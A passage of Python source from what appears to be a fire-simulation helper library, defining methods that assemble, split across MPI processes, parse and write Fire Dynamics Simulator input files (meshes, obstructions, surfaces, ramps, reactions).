if DT_RESTART != None: dump['DT_RESTART'] = DT_RESTART
self.dump['ID'] = dump
def addHEAD(self, chid, title=None):
"""Adds a head key to internal attribute head
Adds a head key to internal attribute head. Note if no title is
specified, title will be set to the same as chid.
Parameters
----------
chid: str
Chid for use in the input file
title: str, optional
Title for use in the input file (default None)
"""
head = defaultdict(bool)
head['CHID'] = chid
if title != None:
head['TITLE'] = title
else:
head['TITLE'] = chid
self.head['ID'] = head
def addHOLE(self, ID, XB):
"""Adds a hole key to internal attribute holes
Adds a hole key to internal attribute holes.
Parameters
----------
ID : str
String identifier for the hole
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
"""
hole = defaultdict(bool)
hole['XB'] = XB
hole['ID'] = ID
self.holes[ID] = hole
def addMATL(self, ID, Emi=None, Den=None, Con=None, Spe=None,
kramp=None, cpramp=None, fyi=None):
"""Adds a matl key to internal attribute matls
Adds a matl key to internal attribute matls. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the material
Emi : float, optional
Emissivity of the material (default None)
Den : float, optional
Density of the material (default None)
Con : float, optional
Conductivity of the material (default None)
Spe : float, optional
Specific heat of the material (default None)
kramp : str, optional
String identifier of thermal conductivity ramp
(default None)
cpramp : str, optional
String identifier of specific heat capacity ramp
(default None)
fyi : str, optional
String containing comment field to be included in input file
(default None)
"""
matl = defaultdict(bool)
matl['ID'] = ID
if Emi != None: matl['EMISSIVITY'] = Emi
if Den != None: matl['DENSITY'] = Den
if Con != None: matl['CONDUCTIVITY'] = Con
if Spe != None: matl['SPECIFIC_HEAT'] = Spe
if kramp != None: matl['CONDUCTIVITY_RAMP'] = kramp
if cpramp != None: matl['SPECIFIC_HEAT_RAMP'] = cpramp
if fyi != None: matl['FYI'] = fyi
self.matls[ID] = matl
def addMESH(self, ID, IJK, XB):
"""Adds a mesh key to internal attribute meshes
Adds a mesh key to internal attribute meshes.
Parameters
----------
ID : str
String identifier for the mesh
IJK : int array(3)
Three component array containing number of grid cells in
each axis
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
"""
mesh = defaultdict(bool)
if type(IJK) is list: IJK = np.array(IJK)
if type(XB) is list: XB = np.array(XB)
mesh['ID'] = ID
mesh['IJK'] = IJK
mesh['XB'] = XB
self.meshes[ID] = mesh
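# Usage sketch (hypothetical values; assumes an instance `fds` of this class):
# a 5 m x 5 m x 2.5 m domain discretized with 0.1 m cells.
#     fds.addMESH('MESH-01', IJK=[50, 50, 25], XB=[0.0, 5.0, 0.0, 5.0, 0.0, 2.5])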
def addMISC(self, BNDF_DEFAULT=None, TMPA=None):
"""Adds a misc key to internal attribute misc
Adds a misc key to internal attribute misc. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
BNDF_DEFAULT : bool, optional
Flag specifying if boundary data is to be output for all
boundary surfaces by default (default None)
TMPA : float, optional
Ambient air temperature (default None)
"""
misc = defaultdict(bool)
if BNDF_DEFAULT != None: misc['BNDF_DEFAULT'] = BNDF_DEFAULT
if TMPA != None: misc['TMPA'] = TMPA
self.misc['ID'] = misc
def calculateCellsPerProcess(self):
"""Calculates the number of cells per mpi process based on
information stored in internal attributes
"""
meshes, numCells = self.calculateMeshCells()
numProcesses = self.mpiProcesses
IdealCellsPerProcess = np.sum(numCells)/numProcesses
cellsPerProcess = np.zeros((numProcesses,))
for i, mesh in enumerate(meshes):
process = int(self.meshes[mesh]['MPI_PROCESS'])
cellsPerProcess[process] += numCells[i]
return IdealCellsPerProcess, cellsPerProcess
def addMPIprocesses(self, numberOfProcesses,
allowMeshSplitting=True, splitMultiplier=1.20,
meshSplitAxes=[True, True, False]):
"""Adds mpi processes to meshes stored in internal attributes
Adds mpi processes to meshes stored in internal attributes.
Can be used to automatically split meshes to balance load on
mpi processes.
Parameters
----------
numberOfProcesses : int
Number of mpi processes
allowMeshSplitting : bool
Flag specifying whether meshes can be split
splitMultiplier : float
Threshold used in splitting meshes
meshSplitAxes : list of booleans
Specifies along which axes the software is allowed to split
meshes.
"""
meshes, numCells = self.calculateMeshCells()
cellsPerProcess = np.sum(numCells)/numberOfProcesses
mpiConverged = False
splitConverged = False
assumedConverged = False
while not mpiConverged and not assumedConverged:
mpiConverged = True
while not splitConverged and allowMeshSplitting:
splitConverged = True
meshes, numCells = self.calculateMeshCells()
for mesh, numCell in zip(meshes, numCells):
if numCell > cellsPerProcess*splitMultiplier:
self.splitMESHonce(self.meshes[mesh], meshSplitAxes)
splitConverged = False
meshes, numCells = self.calculateMeshCells()
#print(len(meshes), numberOfProcesses)
if len(meshes) / 10 > numberOfProcesses:
print("Warning: Number of meshes 10x greater than number of requested processes (%0.0f, %0.0f)"%(len(meshes), numberOfProcesses))
print("AssumingConvergence")
assumedConverged = True
mpiProcessInds = np.zeros((len(numCells),))-1
mpiProcess = np.zeros((numberOfProcesses,))
while np.argwhere(mpiProcessInds == -1).shape[0] > 0:
ind = np.argmax(numCells)
ind2 = np.argmin(mpiProcess)
mpiProcessInds[ind] = ind2
mpiProcess[ind2] += numCells[ind]
numCells[ind] = 0
if np.max(mpiProcess) > cellsPerProcess*splitMultiplier and allowMeshSplitting:
mpiConverged = False
splitConverged = False
splitMultiplier = splitMultiplier*0.9
for key, mp in zip(meshes, mpiProcessInds):
self.meshes[key]['MPI_PROCESS'] = mp
self.mpiProcesses = numberOfProcesses
self.meshOrder = np.argsort(mpiProcessInds)
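# Usage sketch (hypothetical; assumes an instance `fds` of this class):
# balance the meshes defined so far across 4 mpi processes, allowing
# splits along x and y but not z.
#     fds.addMPIprocesses(4, allowMeshSplitting=True, splitMultiplier=1.2,
#                         meshSplitAxes=[True, True, False])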
def addOBST(self, ID, XB, SURF_IDS=None, SURF_ID=None,
SURF_ID6=None, BNDF_OBST=True, THICKEN=None,
TRANSPARENCY=None, COLOR=None):
"""Adds an obst key to internal attribute obsts
Adds an obst key to internal attribute obsts. Optional
parameters that are specified as None will not be explicitly
specified in a generated input file. These values at runtime
will default to current FDS default parameters.
Parameters
----------
ID : str
String identifier for the obstruction
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
SURF_IDS : str array(3), optional
Three component array specifying surface definition
(default None)
SURF_ID : str, optional
String specifying the surface for all faces (default None)
SURF_ID6 : str array(6), optional
Six component array specifying surface definition for
X-, X+, Y-, Y+, Z-, Z+ (default None)
BNDF_OBST : bool, optional
Flag specifying if boundary data is to be output for all
faces of this obstruction (default True)
THICKEN : bool, optional
Flag specifying if obstruction is to be thickened to be at
least one grid cell thick (default None)
TRANSPARENCY : float, optional
Value specifying how transparent this obstruction should be
in visualization (default None)
COLOR : str, optional
String specifying a color for the obstruction (default None)
"""
obst = defaultdict(bool)
obst['XB'] = XB
obst['ID'] = ID
if SURF_IDS != None: obst['SURF_IDS'] = SURF_IDS
if SURF_ID != None: obst['SURF_ID'] = SURF_ID
if SURF_ID6 != None: obst['SURF_ID6'] = SURF_ID6
if BNDF_OBST: obst['BNDF_OBST'] = True
if THICKEN != None: obst['THICKEN'] = THICKEN
if TRANSPARENCY != None: obst['TRANSPARENCY'] = TRANSPARENCY
if COLOR != None: obst['COLOR'] = COLOR
if self.obsts[ID]:
counter = self.obsts[ID]['counter']
counter += 1
self.obsts["%s-%0.0f"%(ID, counter)] = obst
self.obsts[ID]['counter'] = counter
else:
obst['counter'] = 0
self.obsts[ID] = obst
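# Usage sketch (hypothetical; assumes an instance `fds` of this class):
# a 1 m x 1 m x 0.5 m obstruction referencing a surface ID that is
# assumed to be defined elsewhere with addSURF.
#     fds.addOBST('TABLE', [2.0, 3.0, 2.0, 3.0, 0.0, 0.5], SURF_ID='TABLE_SURF')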
def addPRES(self, VELOCITY_TOLERANCE=None,
MAX_PRESSURE_ITERATIONS=None):
"""Adds a pres key to internal attribute pres
Adds a pres key to internal attribute pres. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
VELOCITY_TOLERANCE : float
Value for the velocity error tolerance
MAX_PRESSURE_ITERATIONS : int
Maximum number of iterations allowed in the pressure solver
"""
pres = defaultdict(bool)
if VELOCITY_TOLERANCE != None:
pres['VELOCITY_TOLERANCE'] = VELOCITY_TOLERANCE
if MAX_PRESSURE_ITERATIONS != None:
pres['MAX_PRESSURE_ITERATIONS'] = MAX_PRESSURE_ITERATIONS
self.pres['ID'] = pres
def addRAMP(self, ID, T, F, appendZero=False, appendTime=1.0):
"""Adds a ramp key to internal attribute ramps
Adds a ramp key to internal attribute ramps.
Parameters
----------
ID : str
String identifier for the ramp
T : float array(N)
Array specifying the x-axis of the ramp
F : float array(N)
Array specifying the y-axis of the ramp
appendZero : bool, optional
Flag specifying whether to append a final point with F = 0 at
time T[-1] + appendTime (default False)
appendTime : float, optional
Time offset used for the appended zero point (default 1.0)
"""
if type(T) == pd.core.frame.DataFrame: T = T.values
if type(T) == pd.core.series.Series: T = T.values
if type(T) == np.ndarray: T = list(T)
if type(F) == pd.core.frame.DataFrame: F = F.values
if type(F) == pd.core.series.Series: F = F.values
if type(F) == np.ndarray: F = list(F)
if appendZero:
T.append(T[-1] + appendTime)
F.append(0)
if self.ramps[ID]:
Ts = self.ramps[ID]['T']
Fs = self.ramps[ID]['F']
for t, f in zip(T, F):
Ts.append(t)
Fs.append(f)
self.ramps[ID]['T'] = Ts
self.ramps[ID]['F'] = Fs
else:
self.ramps[ID] = defaultdict(bool)
self.ramps[ID]['T'] = T
self.ramps[ID]['F'] = F
self.ramps[ID]['ID'] = ID
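# Usage sketch (hypothetical; assumes an instance `fds` of this class):
# ramp from 0 to full value over 60 s, then hold. The ramp can later be
# referenced from a surface through the qramp argument of addSURF.
#     fds.addRAMP('fireRamp', T=[0.0, 60.0, 600.0], F=[0.0, 1.0, 1.0])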
def addREAC(self, ID, FUEL=None, FORMULA=None, AIT=None, SY=None,
COY=None, HOC=None,
C=None, H=None, O=None, N=None, FYI=None, RF=None):
"""Adds a reac key to internal attribute reacs
Adds a reac key to internal attribute reacs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the reaction
FUEL : str, optional
String name of the fuel in the reaction (default None)
FORMULA : str, optional
String formula of the reaction (default None)
AIT : float, optional
Float auto ignition temperature of the reaction
(default None)
SY : float, optional
Float soot yield of the reaction (default None)
COY : float, optional
Float carbon monoxide yield of the reaction (default None)
HOC : float, optional
Float heat of combustion of the reaction (default None)
C : float, optional
Float number of carbon atoms in the chemical formula of the
reaction (default None)
H : float, optional
Float number of hydrogen atoms in the chemical formula of
the reaction (default None)
O : float, optional
Float number of oxygen atoms in the chemical formula of the
reaction (default None)
N : float, optional
Float number of nitrogen atoms in the chemical formula of
the reaction (default None)
FYI : string, optional
String containing comment field to be included in input file
RF : float, optional
Float radiative fraction of the reaction (default None)
"""
reac = defaultdict(bool)
reac['ID'] = ID
if FUEL != None: reac['FUEL'] = FUEL
if FORMULA != None: reac['FORMULA'] = FORMULA
if AIT != None: reac['AUTO_IGNITION_TEMPERATURE'] = AIT
if SY != None: reac['SOOT_YIELD'] = SY
if COY != None: reac['CO_YIELD'] = COY
if HOC != None: reac['HEAT_OF_COMBUSTION'] = HOC
if C != None: reac['C'] = C
if H != None: reac['H'] = H
if O != None: reac['O'] = O
if N != None: reac['N'] = N
if FYI != None: reac['FYI'] = FYI
if RF != None: reac['RADIATIVE_FRACTION'] = RF
self.reacs[ID] = reac
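# Usage sketch (hypothetical propane-like reaction; assumes an instance `fds`
# of this class, and the yields and heat of combustion are illustrative
# placeholders rather than recommended values):
#     fds.addREAC('PROPANE', FUEL='PROPANE', C=3, H=8,
#                 SY=0.024, COY=0.005, HOC=46460.0)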
def addSLCF(self, QUANTITY, PBX=None, PBY=None, PBZ=None,
Vec=False, XB=None, SPEC_ID=None, CELL_CENTERED=None):
"""Adds a slcf key to internal attribute slcfs
Adds a slcf key to internal attribute slcfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
QUANTITY : str
Quantity of the slice
PBX : float, optional
Value along x-axis of the plane (default None)
PBY : float, optional
Value along y-axis of the plane (default None)
PBZ : float, optional
Value along z-axis of the plane (default None)
Vec : bool, optional
Flag specifying if the slice is a vector slice
(default False)
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
SPEC_ID : str, optional
String specifying the species of the slice
CELL_CENTERED : bool, optional
Boolean specifying whether the quantity is cell centered
"""
slcf = defaultdict(bool)
slcf['ID'] = "SLCF-%05.0f"%(self.slcfs['unknownCounter'])
slcf['QUANTITY'] = QUANTITY
if PBX != None: slcf['PBX'] = PBX
if PBY != None: slcf['PBY'] = PBY
if PBZ != None: slcf['PBZ'] = PBZ
if SPEC_ID != None: slcf['SPEC_ID'] = SPEC_ID
if Vec: slcf['VECTOR'] = 'TRUE'
if XB is not None:
if type(XB) is list: XB = np.array(XB)
slcf['XB'] = XB
if CELL_CENTERED != None: slcf['CELL_CENTERED'] = CELL_CENTERED
self.slcfs['unknownCounter'] += 1
self.slcfs[slcf['ID']] = slcf
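# Usage sketch (hypothetical; assumes an instance `fds` of this class):
# a temperature slice at y = 2.5 m and a vector velocity slice at z = 1.8 m.
#     fds.addSLCF('TEMPERATURE', PBY=2.5)
#     fds.addSLCF('VELOCITY', PBZ=1.8, Vec=True)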
def addSURF(self, ID, Mid=None, Col=None, Thi=None, Bac=None,
Geo=None, Fyi=None, Len=None, LeaPat=None, Hrrpua=None,
qramp=None, Rgb=None, adiabatic=False, VOLUME_FLOW=None,
VEL_T=None):
"""Adds a surf key to internal attribute surfs
Adds a surf key to internal attribute surfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the surface
Mid : str array(N), optional
Array of material IDs in the surface (default None)
Col : str, optional
String specifying the color of the surface (default None)
Thi : float array(N), optional
Array of floats specifying the thickness of each material
in the surface (default None)
Bac : str, optional
String specifying the type of back boundary condition
(default None)
Geo : str, optional
String specifying the type of geometry to use for the
surface (default None)
Fyi : str, optional
String containing comment field to be included in input file
Len : float, optional
Value of length to be used in heat transfer calculation
(default None)
LeaPat : array(2), optional
Array specifying leak path for the surface
Hrrpua : float, optional
Value of heat release rate per unit area of the surface
(default None)
qramp : str, optional
String identifier of ramp for the heat release rate per unit
area (default None)
Rgb : float array(3), optional
Array specifying the color of the surface (default None)
adiabatic : bool, optional
Flag specifying if the surface is adiabatic (default False)
VOLUME_FLOW : float, optional
Value of specified volume flow from the surface
(default None)
VEL_T : float, optional
Value of specified tangential velocity from the surface
(default None)
"""
surf = defaultdict(bool)
surf['ID'] = ID
if Mid != None: surf['MATL_ID'] = Mid
if Col != None: surf['COLOR'] = Col
if Thi != None: surf['THICKNESS'] = Thi
if Bac != None: surf['BACKING'] = Bac
if Geo != None: surf['GEOMETRY'] = Geo
if Fyi != None: surf['FYI'] = Fyi
if Len != None: surf['LENGTH'] = Len
if LeaPat != None: surf['LEAK_PATH'] = LeaPat
if Hrrpua != None: surf['HRRPUA'] = Hrrpua
if qramp != None: surf['RAMP_Q'] = qramp
if Rgb != None: surf['RGB'] = Rgb
if adiabatic: surf['ADIABATIC'] = True
if VOLUME_FLOW != None: surf['VOLUME_FLOW'] = VOLUME_FLOW
if VEL_T != None: surf['VEL_T'] = VEL_T
self.surfs[ID] = surf
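# Usage sketch (hypothetical burner surface; assumes an instance `fds` of this
# class and the 'fireRamp' ramp from the addRAMP sketch; 500.0 kW/m2 is an
# illustrative value):
#     fds.addSURF('BURNER', Hrrpua=500.0, qramp='fireRamp', Col='RED')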
def addTIME(self, T_END=0.0, T_BEGIN=0.0):
"""Adds a time key to internal attribute time
Adds a time key to internal attribute time. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
T_END : float, optional
Time to end the simulation (default 0.0)
T_BEGIN : float, optional
Time to begin the simulation (default 0.0)
"""
time = defaultdict(bool)
time['T_BEGIN'] = T_BEGIN
time['T_END'] = T_END
self.time['ID'] = time
def addVENT(self, ID, SURF_ID, XB=None, CTRL_ID=None, MB=None,
IOR=None):
"""Adds a vent key to internal attribute vents
Adds a vent key to internal attribute vents. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the vent
SURF_ID : str
String identifier specifying the surface of the vent
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates (default None)
CTRL_ID : str, optional
String identifier for control determining if the vent is
active (default None)
MB : str, optional
String specifying short-hand position of axis (default None)
IOR : int, optional
Integer specifying the orientation of the vent
(default None)
"""
vent = defaultdict(bool)
vent['ID'] = ID
vent['SURF_ID'] = SURF_ID
if XB is not None:
if type(XB) is list: XB = np.array(XB)
vent['XB'] = XB
if CTRL_ID != None: vent['CTRL_ID'] = CTRL_ID
if MB != None: vent['MB'] = MB
if IOR != None: vent['IOR'] = IOR
if self.vents[ID]:
counter = self.vents[ID]['counter']
counter += 1
self.vents["%s-%0.0f"%(ID, counter)] = vent
self.vents[ID]['counter'] = counter
else:
vent['counter'] = 0
self.vents[ID] = vent
def addZONE(self, ID, XB, LEAK_AREA=None):
"""Adds a zone key to internal attribute zones
Adds a zone key to internal attribute zones. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the zone
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
LEAK_AREA : float array(N), optional
Leakage area to each pressure zone
"""
zone = defaultdict(bool)
zone['ID'] = ID
zone['XB'] = XB
if LEAK_AREA != None: zone['LEAK_AREA'] = LEAK_AREA
self.zones[ID] = zone
def calculateMeshCells(self):
"""Returns a list of mesh keys and number of cells in each mesh
Returns
-------
list
List of mesh keys
list
List of number of cells
"""
meshes = []
numCells = []
meshKeys = list(self.meshes.keys())
try:
meshKeys.remove('unknownCounter')
except:
pass
for key in meshKeys:
IJK = self.meshes[key]['IJK']
numCells.append(IJK[0]*IJK[1]*IJK[2])
meshes.append(key)
return meshes, numCells
def checkOverlappingMESH(self):
"""Returns True if any meshes are overlapping else False
Returns
-------
bool
True if any meshes are overlapping, else False
"""
def in_hull(p,hull):
if not isinstance(hull,scsp.Delaunay):
hull = scsp.Delaunay(hull)
return hull.find_simplex(p)>=0
def pointsFromXB(XB,extend=[0.05, -0.05, 0.05, -0.05, 0, 0]):
pts = [[XB[0]+extend[0],XB[2]+extend[2],XB[4]+extend[4]],
[XB[0]+extend[0],XB[2]+extend[2],XB[5]+extend[5]],
[XB[0]+extend[0],XB[3]+extend[3],XB[4]+extend[4]],
[XB[0]+extend[0],XB[3]+extend[3],XB[5]+extend[5]],
[XB[1]+extend[1],XB[2]+extend[2],XB[4]+extend[4]],
[XB[1]+extend[1],XB[2]+extend[2],XB[5]+extend[5]],
[XB[1]+extend[1],XB[3]+extend[3],XB[4]+extend[4]],
[XB[1]+extend[1],XB[3]+extend[3],XB[5]+extend[5]]]
return pts
meshHulls = defaultdict(bool)
for key in list(self.meshes.keys()):
pts = pointsFromXB(self.meshes[key]['XB'])
meshHull = scsp.Delaunay(pts)
meshHulls[key] = meshHull
overlap = False
for key1 in list(self.meshes.keys()):
for key2 in list(self.meshes.keys()):
if (key1 != key2):
extend = [0.05, -0.05, 0.05, -0.05, 0, 0]
if ('east' in key2): extend = [0.05, 0.1, 0.05, -0.05, 0, 0]
if ('west' in key2): extend = [-0.1, -0.05, 0.05, -0.05, 0, 0]
if ('north' in key2): extend = [0.05, -0.05, 0.05, 0.1, 0, 0]
if ('south' in key2): extend = [0.05, -0.05, -0.1, -0.05, 0, 0]
pts = pointsFromXB(self.meshes[key2]['XB'], extend=extend)
for p in pts:
if in_hull(p, meshHulls[key1]):
overlap = True
return overlap
def dictFromLine(self, line, lineType, types):
"""Returns a dictionary with keys and values from a namelist
Parameters
----------
line : str
String namelist line
lineType : str
String type of namelist
types : dict
Dictionary containing dictionaries of namelist key types
Returns
-------
defaultdict
Dictionary containing keys from the namelist line
"""
lineDict = defaultdict(bool)
keys = self.splitLineIntoKeys(line)
for key in keys:
keyID, keyID2, keyType, keyValue = self.interpretKey(key, lineType, types)
#print(keyID, keyID2, keyType, keyValue)
if keyType == 'string':
keyValue = keyValue.split("'")[1]
elif keyType == 'float':
keyValue = float(keyValue.replace(' ', '').replace(',','').replace('/',''))
elif keyType == 'int':
keyValue = int(keyValue.replace(' ', '').replace(',','').replace('/',''))
elif keyType == 'bool':
keyValue = keyValue.split(".")[1]
elif ('list' in keyType) and ('ind' not in keyType) and ('row' not in keyType):
vals = []
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
for t in keyValues:
if 'string' in keyType: preprocess = t.split("'")[1]
if 'float' in keyType: preprocess = float(t.replace(' ', '').replace(',','').replace('/',''))
if 'int' in keyType: preprocess = int(t.replace(' ', '').replace(',','').replace('/',''))
vals.append(preprocess)
keyValue = vals
elif ('list' in keyType) and ('ind' in keyType) and ('row' not in keyType):
#print(keyID, keyID2, keyType, keyValue)
regex1 = r"(\(.{0,3}):(.{0,3}\))"
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
if 'string' in keyType: keyValues = [x.split("'")[1] for x in keyValues]
if 'float' in keyType: keyValues = [float(x) for x in keyValues]
if 'int' in keyType: keyValues = [int(x) for x in keyValues]
tmp = re.search(regex1, keyID)
if tmp is not None:
ar1 = [int(x) for x in tmp.groups()[0].replace('(','').split(':')]
ar2 = [int(x) for x in tmp.groups()[1].replace(')','').split(':')]
else:
(ar1, ar2) = ([1], [len(keyValues)])
tmp = np.zeros((np.max([ar1, ar2]), 1), dtype='object')
for i in range(0, tmp.shape[0]):
tmp[i-1, 0] = keyValues[i-1]
keyValue = tmp
elif ('list' in keyType) and ('ind' not in keyType) and ('row' in keyType):
vals = []
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
for t in keyValues:
if 'string' in keyType: preprocess = t
if 'float' in keyType: preprocess = float(t.replace(' ', '').replace(',','').replace('/',''))
if 'int' in keyType: preprocess = int(t.replace(' ', '').replace(',','').replace('/',''))
vals.append(preprocess)
keyValue = vals
elif ('matrix' in keyType):
#print(keyID, keyID2, keyType, keyValue)
regex1 = r"(\(.{0,3});(.{0,3}\))"
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
if 'string' in keyType: keyValues = [x.split("'")[1] for x in keyValues]
if 'float' in keyType: keyValues = [float(x) for x in keyValues]
tmp = re.search(regex1, keyID)
if tmp is not None:
ar1 = [int(x) for x in tmp.groups()[0].replace('(','').split(':')]
ar2 = [int(x) for x in tmp.groups()[1].replace(')','').split(':')]
if len(ar1) == 1: ar1 = [ar1[0], ar1[0]]
if len(ar2) == 1: ar2 = [ar2[0], ar2[0]]
else:
(ar1, ar2) = ([1, 1], [1, len(keyValues)])
tmp = np.zeros((np.max(ar1), np.max(ar2)), dtype='object')
counter = 0
if ar1[0] == ar1[1]:
ar1 = np.array(np.zeros((len(keyValues),)) + ar1[0], dtype=np.int32)
else:
ar1 = list(range(ar1[0], ar1[1]+1))
if ar2[0] == ar2[1]:
ar2 = np.array(np.zeros((len(keyValues),)) + ar2[0], dtype=np.int32)
else:
ar2 = list(range(ar2[0], ar2[1]+1))
for counter in range(0, len(keyValues)):
i = ar1[counter]
j = ar2[counter]
tmp[i-1, j-1] = keyValues[counter]
counter += 1
keyValue = tmp
else:
print(lineType.lower(), keyID, keyID2, keyType)
print(len(keyID))
print(line)
print(keys)
assert False, "Stopped"
lineDict[keyID2] = keyValue
return lineDict
def dictMerge(self, template, master, path=None):
"""Merges two dictionaries
This function merges two dictionaries into a single dictionary.
The template dictionary is used as the baseline, and master is
merged into template. Entries in master will overwrite entries
in template. Note, nested dictionaries will be merged using the
same procedure.
Parameters
----------
template : dict or defaultdict
Baseline dictionary
master : dict or defaultdict
Master dictionary. Entries in template will be overwritten
by entries in master.
path : list, optional
Internal variable storing path to current key.
Used in recursive calls for nested dictionaries.
Returns
-------
dict or defaultdict
Merged dictionary
"""
if path is None: path = []
for key in master:
if key in template:
tCheck = isinstance(template[key], dict)
mCheck = isinstance(master[key], dict)
if tCheck and mCheck:
self.dictMerge(template[key], master[key], path + [str(key)])
elif template[key] == master[key]:
pass
else:
template[key] = master[key]
else:
template[key] = master[key]
return template
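# Behaviour sketch (derived from the code above): entries in master win and
# nested dictionaries are merged recursively.
#     template = {'A': 1, 'B': {'X': 1, 'Y': 2}}
#     master = {'B': {'Y': 3}, 'C': 4}
#     self.dictMerge(template, master)
#     # -> {'A': 1, 'B': {'X': 1, 'Y': 3}, 'C': 4}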
def generateFDStext(self, newlines=None, fields=None):
"""Returns str of input file
This function generates the fds input file based on the stored
attribute dictionaries. The optional input parameters provide
customization in how the input file is exported. Providing
a value of None will produce the default configuration.
Parameters
----------
newlines : defaultdict, optional
Dictionary containing boolean for each field type. If True,
each key from the namelist will be placed on a new line.
If False, each key will be placed on the same line.
(default None)
fields : list, optional
List containing the order namelists will be exported to
the input file. (default None)
Returns
-------
str
text of input file
"""
date = datetime.date.today()
(year, month, day) = (date.year, date.month, date.day)
dateStr = "%04.0f-%02.0f-%02.0f"%(year, month, day)
intro = "Input file generated with python-fds-tools v1"
types = fdsLineTypes(version=self.version)
if newlines is None: newlines = self.getNewlineFromTypes()
if fields is None: fields = self.getDefaultFields()
if self.meshOrder is False: self.addMPIprocesses(1)
text = "%s\n"%("!"*72)
text = "%s%s %s on %s%s%s\n"%(
text, "!"*5, intro, dateStr, " "*2, "!"*5)
text = "%s%s\n"%(text, "!"*72)
for field in fields:
key = self.keyFromLineType(field)
keyN = "&%s"%(field)
keyT = getattr(types, field.lower())
keyD = getattr(self, key)
if key == 'meshes':
txt = self.makeMESH(keyD, keyT, order=self.meshOrder)
elif key == 'ramps':
txt = self.makeRAMP(keyD)
else:
newline1 = newlines[key]
newline2 = keyD['newline']
newline = (newline1 or newline2)
txt = self.makeLinesFromDict(keyD, keyT, keyN, newline)
text = "%s%s"%(text, txt)
for line in self.customLines:
text = "%s%s\n"%(text, line)
return text
def getDefaultFields(self):
"""Returns default field order
Returns
-------
list
List of default field order
"""
fields = ["HEAD", "TIME", "MISC", "WIND", "INIT", "DUMP", "ZONE",
"PRES", "MESH", "REAC", "RADI", "MATL", "SURF",
"RAMP", "OBST", "HOLE", "VENT", "PART", "DEVC",
"CTRL", "BNDF", "SLCF", "PROP", "SPEC", "PROF"]
return fields
def getLineType(self, line):
"""Returns namelist key from str line
This function extracts the namelist key from a string line
Parameters
----------
line : str
String containing the fortran namelist line
Returns
-------
str
String containing fortran namelist type
"""
lineType = line[:4]
return lineType
def getMeshLimits(self):
"""Returns a dictionary containing the extents of defined meshes
This function returns a dictionary containing a key 'XB' with an
array of the total extents defined in meshes.
Returns
-------
dict
Nested dictionary containing 'Overall'->'XB'->float array(6)
"""
meshLimits = defaultdict(bool)
limitingXB = [100000, -100000, 100000, -100000, 100000, -100000]
for key in list(self.meshes.keys()):
mesh = self.meshes[key]
XB = mesh['XB']
limitingXB[0] = min([limitingXB[0], XB[0]])
limitingXB[1] = max([limitingXB[1], XB[1]])
limitingXB[2] = min([limitingXB[2], XB[2]])
limitingXB[3] = max([limitingXB[3], XB[3]])
limitingXB[4] = min([limitingXB[4], XB[4]])
limitingXB[5] = max([limitingXB[5], XB[5]])
meshLimits[key] = mesh
meshLimits['Overall'] = defaultdict(bool)
meshLimits['Overall']['XB'] = limitingXB
return meshLimits
def getNewlineFromTypes(self):
"""Returns a dictionary containing default new line parameters
Returns
-------
dict
Dictionary containing default new line parameters
"""
newlines = defaultdict(bool)
newlines['HEAD'] = False
newlines['TIME'] = False
newlines['MISC'] = False
newlines['INIT'] = True
newlines['DUMP'] = False
newlines['ZONE'] = True
newlines['PRES'] = True
newlines['MESH'] = False
newlines['REAC'] = True
newlines['RADI'] = True
newlines['MATL'] = True
newlines['SURF'] = True
newlines['RAMP'] = False
newlines['OBST'] = False
newlines['HOLE'] = False
newlines['VENT'] = False
newlines['PART'] = False
newlines['DEVC'] = False
newlines['CTRL'] = False
newlines['BNDF'] = False
newlines['SLCF'] = False
newlines['PROP'] = False
newlines['SPEC'] = False
return newlines
def getPolygonNamesFromFdsFile(self):
"""Returns alist of polygons defined in the fds input file
This function returns a list of polygons defined in the fds
input file.
Returns
-------
list
List containing names of all obstructions which have
boundary data available.
"""
names = []
obstList = list(self.obsts.keys())
if 'unknownCounter' in obstList:
obstList.remove('unknownCounter')
for key in obstList:
if self.obsts[key]['BNDF_OBST']:
names.append(self.obsts[key]["ID"])
names = list(set(names))
return names
def importFile(self, file=None, text=None, textList=None):
"""Adds keys to each namelist from an input file, text, or list
This function will add keys to each namelist from an input file,
text, or text list.
Parameters
----------
file : str, optional
String containing path to input file
text : str, optional
String containing imported text from an input file
textList : list, optional
List of strings containing individual namelist lines
"""
if file != None:
f = self.zopen(file)
textFDS = f.read()
textFDS = textFDS.decode("utf-8")
elif text != None:
textFDS = text
elif textList != None:
textFDS = '\n'.join(textList)
